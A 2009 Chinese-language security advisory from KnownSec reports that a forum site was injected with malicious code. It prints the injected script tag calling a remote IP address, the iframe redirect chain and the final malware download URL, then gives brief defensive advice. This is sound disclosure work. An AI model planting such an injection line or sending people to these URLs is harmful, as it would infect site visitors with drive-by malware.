網友世界被植入惡意代碼

發佈時間：Sun Jul 12 2009 00:00:44 UTC+0800
最後更新時間：Sun Jul 12 2009 00:00:44 UTC+0800
________________________________________
知道創宇安全團隊（KnownSec Team）於今天捕獲 網友世界（http://bbs.netfriends.com.cn/）被植入惡意代碼。
用戶訪問該頁面將可能被安裝***病毒等惡意程序,能夠致使電腦被***控制而且被竊取敏感信息。

MalUrl:http://bbs.netfriends.com.cn/

網頁被嵌入惡意連接代碼：
<script src=http://219.159.68.185/cnzz.js></script>
掛馬分析：
[wide]http://bbs.netfriends.com.cn/
 [script]http://219.159.68.185/cnzz.js
  [frame]http://xmznb.9966.org/3/3.htm?
   [frame]http://xmznb.9966.org/3/lo.jpg
   [frame]http://xmznb.9966.org/3/yl.htm
    [frame]http://xmznb.9966.org/3/xm14.htm
    [frame]http://xmznb.9966.org/3/z.htm
    [frame]http://xmznb.9966.org/3/ctvod.htm
    [frame]http://xmznb.9966.org/3/of.htm
    [frame]http://xmznb.9966.org/3/ctxxz.htm
    [frame]http://xmznb.9966.org/3/ctqm.htm
    [frame]http://xmznb.9966.org/3/ctlb.htm
    [frame]http://xmznb.9966.org/3/ct122121.htm
   [script]http://js.tongji.linezing.com/1190488/tongji.js
   [script]http://js.users.51.la/2825805.js
  [frame]http://xmznb.9966.org/3/3.htm?
  [frame]http://xmznb.9966.org/3/3.htm?
  [frame]http://xmznb.9966.org/3/3.htm?
最終下載病毒文件：
http://ylzf002.cn/b/3.exe

經過執行以上病毒文件，來達到徹底控制訪問者的系統。

 該網站歷史掛馬次數：1
Google對該網站的斷定：安全

知道安全提醒網民，要作好安全防禦，避免因網絡安全問題影響您正常的生活和工做。若是您發現網站被掛馬，也可向國家互聯網應急中心舉報。 國家互聯網應急中心： http://www.cert.org.cn/
推薦的應對方法：
1.安裝客戶端保護軟件。
2.檢查更新windows及第三方軟件補丁程序。

咱們很樂意他人使用咱們的工做成果，若是使用咱們數據的請通知咱們一下，咱們將十分感謝。

若是您有技術方面的問題或者須要技術諮詢能夠經過如下方式聯繫咱們：
郵箱： sec@knownsec.com或 sec@scanw.com
聯繫電話:13552251891。

知道創宇：專業的WEB安全公司   www.knownsec.com